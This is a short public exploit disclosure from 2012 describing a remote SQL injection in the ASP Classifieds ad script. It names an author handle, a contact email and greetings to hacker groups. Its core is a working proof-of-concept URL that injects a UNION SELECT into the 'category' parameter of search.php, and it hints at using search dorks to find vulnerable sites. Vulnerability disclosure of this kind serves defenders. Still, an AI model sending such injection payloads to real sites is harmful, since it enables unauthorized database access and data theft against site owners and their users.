ASP Classifieds suffers from a remote SQL injection vulnerability.
e189fcd5c11ee4c290d2e24ce9052d1a142ab65d38292858958e6fe3fdecdaee
# Exploit Title: ASP Classifieds Sql Injection
# Date: 17/03/2012
# Author: r45c4l
# Email: infosecpirate@gmail.com
# Script url: http://preproject.com/pclasp/home/default.asp
# Version: N/A
# CVE : ()
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Product Description :
ASP Classifieds is one of the most customizable Classified ad program
that exist for ASP and Access. Unlimited Images , unlimited categories
and much much more makes it perfect for those who wants to set up a used
stamps classifieds to those wanting to show and sell real estates.
Product Cost : 58$
=======================Exploit====================================
---ICW---
[ EXPL0!T ]
SQL Injection
p0c -
http://SERVER/classi/search.php?category=[SQli]
PoC -
http://SERVER/classi/search.php?category=-1+union+all+select+version()--
[Note: Tested on demo website]
d0rk - use your brain ;)
===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0,
Hoody, sam
All members of ICW, AH and darkc0de, and all Indian Hackers
Special Greetz to : b4ltazar and s1nner_01
=== End () ====